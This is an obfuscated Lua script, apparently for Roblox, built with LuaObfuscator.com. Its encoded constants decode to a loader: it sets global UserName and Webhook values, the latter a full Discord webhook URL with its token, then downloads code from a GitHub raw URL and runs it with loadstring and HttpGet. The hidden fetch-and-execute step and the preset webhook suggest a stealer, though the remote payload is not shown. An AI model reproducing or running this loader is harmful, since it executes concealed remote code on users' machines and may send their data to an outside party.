--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25()local v31=0;local v32;local v33;local v34;local v35;local v36;local v37;while true do if ((9 -6)==v31) then if (v36==((0 + 0) -0)) then if (v35==(0 -0)) then return v37 * (0 -0) ;else local v104=0 -0 ;while true do if (v104==(619 -(555 + 64))) then v36=932 -(857 + 74) ;v34=568 -(270 + 97 + (798 -597)) ;break;end end end elseif (v36==(2974 -(214 + 713))) then return ((v35==((952 -(802 + 150)) + 0)) and (v37 * ((1 + 0)/(877 -((759 -477) + 595))))) or (v37 * NaN) ;end return v8(v37,v36-(2660 -(1523 + 114)) ) * (v34 + (v35/((2 + 0)^(73 -21)))) ;end if (v31==(1066 -((123 -55) + 997))) then v34=1;v35=(v21(v33,1271 -(226 + 1044) ,87 -67 ) * ((119 -(24 + 8 + (1082 -(915 + 82))))^(32 + 0))) + v32 ;v31=1 + 1 ;end if (v31==2) then v36=v21(v33,978 -(892 + 65) ,31);v37=((v21(v33,75 -43 )==(1 -(0 -0))) and  -(1 -0)) or (351 -(87 + 263)) ;v31=3;end if (v31==(180 -(67 + 113))) then v32=v24();v33=v24();v31=1;end end end v26=nil;function v26(v38)local v39=0;local v40;local v41;while true do if (v39==(2 + 0)) then v41={};for v80=1 -0 , #v40 do v41[v80]=v2(v1(v3(v40,v80,v80)));end v39=1190 -(1069 + 118) ;end if ((2 -1)==v39) then v40=v3(v16,v19,(v19 + v38) -(1 -(0 + 0)) );v19=v19 + v38 ;v39=793 -(368 + 423) ;end if ((0 + 0)==v39) then v40=nil;if  not v38 then v38=v24();if (v38==0) then return "";end end v39=1;end if (v39==(4 -1)) then return v6(v41);end end end v18=5;end if (v18==7) then function v30(v42,v43,v44)local v45=0;local v46;local v47;local v48;while true do if (v45==1) then v48=v42[3];return function(...)local v82=v46;local v83=v47;local v84=v48;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v98=0,v90 do if (v98>=v84) then v88[v98-v84 ]=v89[v98 + 1 ];else v92[v98]=v89[v98 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v99=0;while true do if (v99==1) then if (v95<=10) then if (v95<=4) then if (v95<=1) then if (v95==0) then v86=v94[3];elseif (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95<=2) then local v120=0;local v121;while true do if (v120==0) then v121=v94[2];v92[v121]=v92[v121](v13(v92,v121 + 1 ,v87));break;end end elseif (v95>3) then v92[v94[2]]=v94[3];elseif (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95<=7) then if (v95<=5) then local v122=0;local v123;local v124;local v125;local v126;while true do if (1==v122) then v87=(v125 + v123) -1 ;v126=0;v122=2;end if (v122==0) then v123=v94[2];v124,v125=v85(v92[v123](v13(v92,v123 + 1 ,v94[3])));v122=1;end if (v122==2) then for v168=v123,v87 do v126=v126 + 1 ;v92[v168]=v124[v126];end break;end end elseif (v95>6) then local v145=0;local v146;while true do if (v145==0) then v146=v94[2];v92[v146]=v92[v146](v13(v92,v146 + 1 ,v87));break;end end else do return;end end elseif (v95<=8) then v86=v94[3];elseif (v95>9) then v92[v94[2]]=v44[v94[3]];else v92[v94[2]]();end elseif (v95<=15) then if (v95<=12) then if (v95>11) then v92[v94[2]]=v94[3]~=0 ;else v92[v94[2]]=v94[3]~=0 ;end elseif (v95<=13) then v92[v94[2]]=v94[3];elseif (v95==14) then do return;end else v92[v94[2]]();end elseif (v95<=18) then if (v95<=16) then local v132=v94[2];local v133,v134=v85(v92[v132](v13(v92,v132 + 1 ,v94[3])));v87=(v134 + v132) -1 ;local v135=0;for v139=v132,v87 do v135=v135 + 1 ;v92[v139]=v133[v135];end elseif (v95==17) then v92[v94[2]][v94[3]]=v94[4];else local v151=0;local v152;local v153;while true do if (v151==1) then v92[v152 + 1 ]=v153;v92[v152]=v153[v94[4]];break;end if (0==v151) then v152=v94[2];v153=v92[v94[3]];v151=1;end end end elseif (v95<=19) then v92[v94[2]]=v44[v94[3]];elseif (v95>20) then local v154=0;local v155;local v156;while true do if (v154==0) then v155=v94[2];v156=v92[v94[3]];v154=1;end if (v154==1) then v92[v155 + 1 ]=v156;v92[v155]=v156[v94[4]];break;end end else v92[v94[2]][v94[3]]=v94[4];end v86=v86 + 1 ;break;end if (v99==0) then v94=v82[v86];v95=v94[1];v99=1;end end end end;end if (v45==0) then v46=v42[1];v47=v42[2];v45=1;end end end return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;function v24()local v49,v50,v51,v52=v1(v16,v19,v19 + (9 -6) );v19=v19 + 4 ;return (v52 * 16777216) + (v51 * (65554 -(10 + 8))) + (v50 * (984 -728)) + v49 ;end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v53,v54,v55)if v55 then local v71=442 -(416 + 26) ;local v72;while true do if (v71==(0 -0)) then v72=(v53/((1 + 1)^(v54-(1 -0))))%((8 -6)^(((v55-(1 + 0)) -(v54-((1602 -1163) -(145 + 293)))) + ((1530 -1099) -(44 + 386)))) ;return v72-(v72%(1487 -(998 + 488))) ;end end else local v73=0;local v74;while true do if (v73==(0 + 0)) then v74=(2 + 0)^(v54-(773 -(201 + 571))) ;return (((v53%(v74 + v74))>=v74) and (1139 -(116 + 1022))) or 0 ;end end end end v22=nil;v18=2;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v56)if (v1(v56,2)==79) then local v75=0;while true do if (v75==0) then v20=v0(v3(v56,1,1));return "";end end else local v76=v2(v0(v56,16));if v20 then local v96=0;local v97;while true do if (v96==0) then v97=v5(v76,v20);v20=nil;v96=1;end if (v96==1) then return v97;end end else return v76;end end end);v18=1;end if (v18==2) then function v22()local v57=0 + 0 ;local v58;while true do if (v57==(859 -(814 + 45))) then v58=v1(v16,v19,v19);v19=v19 + (2 -(886 -(261 + 624))) ;v57=1 + 0 ;end if (v57==(1 -0)) then return v58;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + (1082 -(1020 + 60)) ;return (v60 * (1679 -(630 + 793))) + v59 ;end v18=3;end if (v18==6) then v29=nil;function v29()local v61=0 -0 ;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if (v61==(1 + 1)) then v66=nil;v67=nil;v61=7 -4 ;end if (v61==3) then v68=nil;v69=nil;v61=4;end if (v61~=(1255 -(721 + 530))) then else v70=nil;while true do if (v62~=(1275 -(945 + 326))) then else while true do if (v63~=0) then else local v111=0;local v112;while true do if (v111==0) then v112=0 -0 ;while true do if ((0 + 0)==v112) then local v118=700 -(271 + 429) ;while true do if (v118==0) then v64=0;v65=nil;v118=1;end if (v118==(1 + 0)) then v112=1;break;end end end if (v112==(1501 -(1408 + 92))) then v63=1087 -(461 + 625) ;break;end end break;end end end if ((1289 -(993 + 295))==v63) then local v113=0;local v114;while true do if (v113==(0 + 0)) then v114=1171 -(418 + 753) ;while true do if (v114==0) then v66=nil;v67=nil;v114=1 + 0 ;end if ((1 + 0)~=v114) then else v63=2;break;end end break;end end end if (v63==(1 + 2)) then v70=nil;while true do local v116=0 + 0 ;local v117;while true do if (v116==0) then v117=529 -(406 + 123) ;while true do if ((1769 -(1749 + 20))==v117) then local v138=0 + 0 ;while true do if (v138==(1322 -(1249 + 73))) then if (v64==2) then local v183=0 + 0 ;local v184;while true do if (0==v183) then v184=0;while true do if (v184==0) then local v189=1145 -(466 + 679) ;local v190;while true do if (v189==0) then v190=0;while true do if (v190~=(0 -0)) then else local v201=0;while true do if (v201==1) then v190=1;break;end if (v201~=(0 -0)) then else for v208=1,v69 do local v209=0;local v210;local v211;local v212;while true do if ((1900 -(106 + 1794))==v209) then v210=0;v211=nil;v209=1;end if (v209~=(1 + 0)) then else v212=nil;while true do if (v210~=(0 + 0)) then else local v219=0 -0 ;while true do if ((0 -0)==v219) then v211=v22();v212=nil;v219=1;end if ((115 -(4 + 110))==v219) then v210=1;break;end end end if (1==v210) then if (v211==(585 -(57 + 527))) then v212=v22()~=(1427 -(41 + 1386)) ;elseif (v211==2) then v212=v25();elseif (v211~=3) then else v212=v26();end v70[v208]=v212;break;end end break;end end end v68[3]=v22();v201=104 -(17 + 86) ;end end end if (1==v190) then v184=1;break;end end break;end end end if (v184==1) then for v193=1 + 0 ,v24() do local v194=0 -0 ;local v195;local v196;while true do if (v194~=(2 -1)) then else while true do if (v195~=0) then else v196=v22();if (v21(v196,167 -(122 + 44) ,1 -0 )==0) then local v203=0;local v204;local v205;local v206;local v207;while true do if (v203==1) then v206=nil;v207=nil;v203=6 -4 ;end if ((0 + 0)==v203) then v204=0 + 0 ;v205=nil;v203=1;end if (v203==(3 -1)) then while true do if (v204==3) then if (v21(v206,68 -(30 + 35) ,3 + 0 )==(1258 -(1043 + 214))) then v207[4]=v70[v207[4]];end v65[v193]=v207;break;end if (1==v204) then local v215=0 -0 ;local v216;while true do if (v215~=(1212 -(323 + 889))) then else v216=0;while true do if (v216~=(2 -1)) then else v204=582 -(361 + 219) ;break;end if (v216==(320 -(53 + 267))) then v207={v23(),v23(),nil,nil};if (v205==0) then local v227=0;local v228;local v229;local v230;while true do if (v227~=1) then else v230=nil;while true do if (v228==0) then v229=0 + 0 ;v230=nil;v228=1;end if (v228==1) then while true do if (0~=v229) then else v230=0;while true do if (v230~=(0 + 0)) then else v207[853 -(20 + 830) ]=v23();v207[4]=v23();break;end end break;end end break;end end break;end if (v227==0) then v228=0 + 0 ;v229=nil;v227=127 -(116 + 10) ;end end elseif (v205==(1 + 0)) then v207[741 -(542 + 196) ]=v24();elseif (v205==2) then v207[6 -3 ]=v24() -((1 + 1)^(9 + 7)) ;elseif (v205~=(2 + 1)) then else local v233=0 -0 ;local v234;while true do if (v233==0) then v234=0 -0 ;while true do if (v234~=(1551 -(1126 + 425))) then else v207[3]=v24() -((407 -(118 + 287))^(62 -46)) ;v207[1125 -(118 + 1003) ]=v23();break;end end break;end end end v216=1;end end break;end end end if (v204==(0 -0)) then local v217=0;while true do if (v217==(378 -(142 + 235))) then v204=1;break;end if (v217==(0 -0)) then v205=v21(v196,1 + 1 ,3);v206=v21(v196,4,6);v217=978 -(553 + 424) ;end end end if (v204==2) then local v218=0 -0 ;while true do if ((1 + 0)==v218) then v204=3 + 0 ;break;end if (v218==0) then if (v21(v206,1 + 0 ,1 + 0 )==1) then v207[2]=v70[v207[2 + 0 ]];end if (v21(v206,2,4 -2 )==(2 -1)) then v207[3]=v70[v207[6 -3 ]];end v218=1;end end end end break;end end end break;end end break;end if (v194~=0) then else local v197=0;local v198;while true do if (v197~=0) then else v198=0;while true do if (v198==(0 + 0)) then local v213=0;while true do if (v213~=(4 -3)) then else v198=754 -(239 + 514) ;break;end if (v213==0) then v195=0 + 0 ;v196=nil;v213=1;end end end if (v198~=(1330 -(797 + 532))) then else v194=1;break;end end break;end end end end end v64=3 + 0 ;break;end end break;end end end if (v64~=(1 + 0)) then else local v185=0 -0 ;local v186;local v187;while true do if (v185~=(1203 -(373 + 829))) then else while true do if (v186==0) then v187=731 -(476 + 255) ;while true do if (0==v187) then v68={v65,v66,nil,v67};v69=v24();v187=1 -0 ;end if (v187~=1) then else v70={};v64=2;break;end end break;end end break;end if (v185==0) then v186=0;v187=nil;v185=1;end end end v138=1 -0 ;end if (v138==(239 -(64 + 174))) then v117=1;break;end end end if (v117==(1 + 0)) then if (v64==3) then local v159=0;local v160;while true do if (0==v159) then v160=0;while true do if (0==v160) then local v188=0;while true do if (v188==(0 -0)) then local v191=336 -(144 + 192) ;while true do if (0==v191) then for v199=217 -(42 + 174) ,v24() do v66[v199-(1 + 0) ]=v29();end return v68;end end end end end end break;end end end if (v64~=(0 + 0)) then else local v161=0;local v162;local v163;while true do if (v161==(0 + 0)) then v162=1504 -(363 + 1141) ;v163=nil;v161=1;end if (v161~=(1581 -(1183 + 397))) then else while true do if (v162==0) then v163=0 -0 ;while true do if (v163==(1 + 0)) then v67={};v64=1 + 0 ;break;end if (v163==(1975 -(1913 + 62))) then local v192=0;while true do if (v192~=1) then else v163=1 + 0 ;break;end if (v192==0) then v65={};v66={};v192=2 -1 ;end end end end break;end end break;end end end break;end end break;end end end break;end if (2==v63) then local v115=1933 -(565 + 1368) ;while true do if (v115==0) then v68=nil;v69=nil;v115=3 -2 ;end if (v115==1) then v63=1664 -(1477 + 184) ;break;end end end end break;end if (v62~=(0 -0)) then else local v100=0;while true do if (v100~=0) then else v63=0;v64=nil;v100=1;end if (v100==1) then v62=1;break;end end end if (v62==(1 + 0)) then local v101=0;while true do if (v101~=(857 -(564 + 292))) then else v62=2;break;end if (0~=v101) then else v65=nil;v66=nil;v101=1 -0 ;end end end if (v62==3) then local v102=0 -0 ;while true do if (v102~=(305 -(244 + 60))) then else v62=4;break;end if (v102~=(0 + 0)) then else v69=nil;v70=nil;v102=1;end end end if (v62==(478 -(41 + 435))) then local v103=0;while true do if (v103~=(1002 -(938 + 63))) then else v62=3 + 0 ;break;end if (v103~=(1125 -(936 + 189))) then else v67=nil;v68=nil;v103=1 + 0 ;end end end end break;end if (1==v61) then v64=nil;v65=nil;v61=2;end if (v61==(1613 -(1565 + 48))) then v62=0 + 0 ;v63=nil;v61=1139 -(782 + 356) ;end end end v30=nil;v18=7;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303023O005F4703083O00557365724E616D6503083O0062656E79752O313403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31352O3036303438362O353338343537362F457A6E4D374E45434C696A5941566D47736273706142476E4C7042696A4E5639613937364C6177426E7841656C696547336A4361734970526C776E4A754C696A564D457400153O0012043O00013O0026013O000C0001000200044O000C000100120A000100033O00120A000200043O002015000200020005001204000400064O000B000500014O0010000200054O000700013O00022O000900010001000100044O001400010026013O00010001000100044O0001000100120A000100073O00301100010008000900120A000100073O0030110001000A000B0012043O00023O00044O000100012O00063O00017O00",v9(),...);end
